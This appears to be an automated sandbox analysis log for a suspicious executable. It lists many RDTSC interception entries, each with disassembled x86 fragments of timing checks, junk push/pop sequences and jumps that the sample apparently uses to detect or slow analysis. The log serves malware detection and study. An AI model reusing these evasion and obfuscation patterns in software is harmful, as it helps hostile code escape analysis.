Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050CDB second address: 1050CE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050CE1 second address: 1050D02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F76E5186DF2h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050D02 second address: 1050D20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a mov dword ptr [ebp+122D1C1Dh], edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050D20 second address: 1050D2A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105142E second address: 1051438 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1051438 second address: 1051460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F76E5186DE8h 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1051460 second address: 10514E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F76E5036BA8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 sub dword ptr [ebp+122D190Dh], edi 0x0000002b push 0000001Eh 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F76E5036BA8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 clc 0x00000048 nop 0x00000049 jo 00007F76E5036BBFh 0x0000004f push esi 0x00000050 jmp 00007F76E5036BB7h 0x00000055 pop esi 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F76E5036BB6h 0x0000005e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10515BC second address: 10515C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10517B8 second address: 10517D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10518A6 second address: 10518E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 popad 0x00000013 push edi 0x00000014 mov edx, dword ptr [ebp+122D2AFBh] 0x0000001a pop edi 0x0000001b lea eax, dword ptr [ebp+124802F6h] 0x00000021 add cx, C185h 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F76E5186DF1h 0x0000002f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10518E1 second address: 1051939 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F76E5036BA8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+124802B2h] 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F76E5036BA8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 nop 0x00000045 push esi 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1051939 second address: 105195A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 je 00007F76E5186E04h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F76E5186DF2h 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108E89A second address: 108E8AB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108E8AB second address: 108E8B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108E8B1 second address: 108E8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108E8B7 second address: 108E8CA instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5186DE8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b jbe 00007F76E5186DE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108EB47 second address: 108EB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108ECBE second address: 108ECC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1091D93 second address: 1091D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1093DF3 second address: 1093E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F76E5186DF2h 0x0000000c jnp 00007F76E5186DE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109AEB8 second address: 109AEE8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F76E5036BB8h 0x00000012 popad 0x00000013 pop ebx 0x00000014 jne 00007F76E5036BC5h 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B054 second address: 109B058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B058 second address: 109B05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B05E second address: 109B067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B067 second address: 109B072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F76E5036BA6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B1F5 second address: 109B204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 ja 00007F76E5186E04h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B204 second address: 109B215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F76E5036BA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B215 second address: 109B219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B675 second address: 109B69E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F76E5036BACh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F76E5036BB1h 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B69E second address: 109B6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B6A4 second address: 109B6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c popad 0x0000000d push ecx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B800 second address: 109B81C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F76E5186DF7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B81C second address: 109B825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B825 second address: 109B82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B82B second address: 109B84A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B84A second address: 109B863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DF3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B863 second address: 109B86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F76E5036BA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109B992 second address: 109B99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109BD07 second address: 109BD40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 jmp 00007F76E5036BACh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop ebx 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F76E5036BB6h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109BD40 second address: 109BD4A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76E5186DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109AA24 second address: 109AA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F76E5036BA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109AA32 second address: 109AA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109AA36 second address: 109AA40 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109AA40 second address: 109AA72 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F76E5186DE6h 0x00000009 jmp 00007F76E5186DF6h 0x0000000e pop ecx 0x0000000f push esi 0x00000010 jmp 00007F76E5186DEFh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109F04F second address: 109F059 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F76E5036BA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109F17A second address: 109F19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5186DEAh 0x00000009 jmp 00007F76E5186DF4h 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 109F19C second address: 109F1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10A600C second address: 10A6035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jp 00007F76E5186DE6h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F76E5186DE6h 0x00000014 jmp 00007F76E5186DF5h 0x00000019 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1051258 second address: 10512BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F76E5036BB4h 0x0000000e nop 0x0000000f sbb cx, 56F7h 0x00000014 mov ebx, dword ptr [ebp+124802F1h] 0x0000001a call 00007F76E5036BB7h 0x0000001f mov dword ptr [ebp+122D2289h], edx 0x00000025 pop edi 0x00000026 add eax, ebx 0x00000028 call 00007F76E5036BB3h 0x0000002d mov di, 4F78h 0x00000031 pop edx 0x00000032 nop 0x00000033 pushad 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10AA770 second address: 10AA77B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F76E5186DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10AEB7E second address: 10AEB84 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10AE3DB second address: 10AE3E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10AE3E1 second address: 10AE3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F76E5036BB6h 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10AE3FF second address: 10AE41C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10AE41C second address: 10AE426 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76E5036BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10AE8C4 second address: 10AE8CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10AE8CA second address: 10AE8CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B64BA second address: 10B64C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B64C0 second address: 10B64C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B64C5 second address: 10B64F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF7h 0x00000007 push edx 0x00000008 ja 00007F76E5186DE6h 0x0000000e jp 00007F76E5186DE6h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jg 00007F76E5186DF4h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B462C second address: 10B4646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F76E5036BB0h 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B4646 second address: 10B464C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B464C second address: 10B4665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5036BB5h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B4954 second address: 10B4959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B4959 second address: 10B4961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B4961 second address: 10B4965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B5418 second address: 10B5427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F76E5036BA6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B5427 second address: 10B5431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B5431 second address: 10B544B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F76E5036BB1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B5700 second address: 10B5711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DEDh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B59E2 second address: 10B59E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B59E6 second address: 10B59EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B59EC second address: 10B59F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B59F2 second address: 10B59F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B59F6 second address: 10B59FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B59FC second address: 10B5A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F76E5186DEAh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F76E5186DE6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
